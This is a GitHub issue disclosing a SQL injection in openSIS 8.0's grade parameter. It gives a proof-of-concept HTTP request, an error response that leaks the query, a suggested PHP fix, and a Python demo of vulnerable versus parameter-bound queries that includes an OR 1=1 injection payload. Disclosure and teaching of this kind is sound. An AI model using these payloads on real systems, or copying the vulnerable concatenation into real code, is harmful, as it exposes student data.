
SQL injection in multiple functions #202

Closed
@quanhx11

Description


A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can issue SQL commands through the Grade= parameter of /opensis/functions/GetStuListFnc.php.
POC

REQUEST

POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
<b>SQL:</b></TD>
			<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT  FROM students s ,student_enrollment ssm  LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID   AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL)  OR ssm.DROP_CODE=33 )  AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc'  AND LOWER(s.ALT_ID) LIKE '123%'  AND LOWER(s.LAST_NAME) LIKE 'ad%'  AND LOWER(s.FIRST_NAME) LIKE 'ácd%'  AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
		</TR>
[...]


SOLUTION
Use the function sqlSecurityFilter() before assigning $_REQUEST['grade'] to the query.
The code should look like:

  if ($_REQUEST['grade']) {
        // filter the user-supplied value before it is spliced into the query
        $grade = sqlSecurityFilter($_REQUEST['grade']);
        $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=\'' . singleQuoteReplace("'", "\'", $grade) . '\')';
    }
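Added example, not code from the report or from openSIS: a self-contained Python/sqlite3 model of the grade-level subquery visible in the response above, with the vulnerable string concatenation beside a parameter-bound version. The table and column names follow the query in the report; the schema is a simplified stand-in for the real openSIS tables and the rows are constructed sample data. It shows both outcomes of injecting into that position: a bare quote breaks the statement (the error-page behaviour in the report), and a crafted value closes the subquery and rewrites the WHERE clause so the count covers every enrolled student.

```python
import sqlite3

# Constructed sample data standing in for openSIS's school_gradelevels and
# student_enrollment tables (names taken from the query in the report).
SCHEMA = """
CREATE TABLE school_gradelevels (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE student_enrollment (student_id INTEGER, grade_id INTEGER);
INSERT INTO school_gradelevels VALUES (1, 'Grade 1'), (2, 'Grade 2');
INSERT INTO student_enrollment VALUES (100, 1), (101, 1), (102, 2);
"""


def open_db():
    """Return an in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_students_vulnerable(conn, grade):
    """Mirror the reported code path: the request parameter is spliced
    straight into the IN(...) subquery, so its quotes are parsed as SQL."""
    sql = (
        "SELECT COUNT(ssm.student_id) FROM student_enrollment ssm "
        "WHERE ssm.grade_id IN(SELECT id FROM school_gradelevels "
        "WHERE title='" + grade + "')"
    )
    return conn.execute(sql).fetchone()[0]


def count_students_fixed(conn, grade):
    """Hardened form: the value is bound as a parameter, so the database
    never parses it as SQL no matter which quote characters it contains."""
    sql = (
        "SELECT COUNT(ssm.student_id) FROM student_enrollment ssm "
        "WHERE ssm.grade_id IN(SELECT id FROM school_gradelevels "
        "WHERE title=?)"
    )
    return conn.execute(sql, (grade,)).fetchone()[0]


def classify(conn, grade):
    """Run the vulnerable path and report ('ok', count) or ('error', message),
    so a malformed payload can be distinguished from a logic-altering one."""
    try:
        return ("ok", count_students_vulnerable(conn, grade))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = open_db()
    # Legitimate value from the form: both paths agree.
    print("Grade 1 (vulnerable):", classify(db, "Grade 1"))
    print("Grade 1 (fixed):     ", count_students_fixed(db, "Grade 1"))
    # The bare quote from the report: syntax error on the vulnerable path.
    print("' (vulnerable):      ", classify(db, "'"))
    print("' (fixed):           ", count_students_fixed(db, "'"))
    # Closing the subquery and appending OR 1=1 widens the count to all rows.
    payload = "x') OR 1=1 --"
    print("payload (vulnerable):", classify(db, payload))
    print("payload (fixed):     ", count_students_fixed(db, payload))
```

The equivalent in the project's PHP is a mysqli or PDO prepared statement with the grade bound as a parameter. Escaping the quote character instead, as the suggested singleQuoteReplace() call does, is dialect-dependent: backslash escaping is a MySQL/MariaDB feature rather than standard SQL and is switched off by the NO_BACKSLASH_ESCAPES sql_mode, so binding is the more robust fix.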

Labels: Next Release (Fix will be provided with the next release)